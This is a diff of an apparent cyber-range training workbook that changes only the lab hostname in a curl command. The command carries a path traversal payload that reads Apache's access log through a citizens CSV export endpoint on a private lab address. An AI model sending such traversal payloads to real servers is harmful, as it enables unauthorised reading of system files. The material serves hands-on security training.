--- a/contents/battle-workbook/compliance-w05.docx
+++ b/contents/battle-workbook/compliance-w05.docx
@@ -507,7 +507,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>curl -s -A "co05r1-kim" -H "Host: govportal.6v6.lab" \</w:t>
+        <w:t>curl -s -A "co05r1-kim" -H "Host: govportal.el34.lab" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">  "http://192.168.0.161/api/citizens/export.csv?file=co05r1-kim/../../../../var/log/apache2/access.log"</w:t>
       </w:r>
